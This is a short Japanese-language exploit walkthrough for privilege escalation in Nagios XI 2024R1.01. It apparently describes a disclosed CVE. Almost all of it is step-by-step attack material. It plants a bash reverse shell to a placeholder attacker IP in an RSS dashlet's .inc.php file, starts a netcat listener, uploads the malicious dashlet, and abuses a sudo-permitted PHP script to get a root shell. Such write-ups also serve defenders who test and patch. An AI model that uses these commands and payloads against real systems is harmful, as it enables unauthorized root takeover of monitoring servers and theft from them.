
Nagios XI 2024R1.01の権限昇格エクスプロイト。悪意のあるRSS dashlet injectionとsudo command executionにより、NAGIOSまたはAPACHEユーザーからフルrootアクセスを可能にする。
CVE Discovered by: K. Wahab (Neo`X)
この例ではRSS Dashletが使用されています。
以下の内容を、"/usr/local/nagiosxi/html/includes/dashlets/"内のdashletの.inc.phpファイルに追加します:
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
攻撃マシンでNetcatリスニングサーバーを起動します:
nc -nlvp 4441
以下のコマンドを実行して権限を昇格し、rootとして接続を受け取ります:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
「dashlets」管理ページにアクセスし、Dashletをダウンロードします:
http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
*.inc.phpを変更します:
exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");

攻撃マシンでNetcatリスニングサーバーを起動します:
nc -nlvp 4441
悪意のあるダッシュレットをダッシュレット管理ページにアップロードし、APACHEユーザーとしての接続を待ちます。
以下のコマンドを実行して権限を昇格し、rootとして接続を受け取ります:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
(注:コマンド実行後、APACHEとして接続を受け取ります。CTRL+Cで終了し、リスナーを複数回再起動してください。)
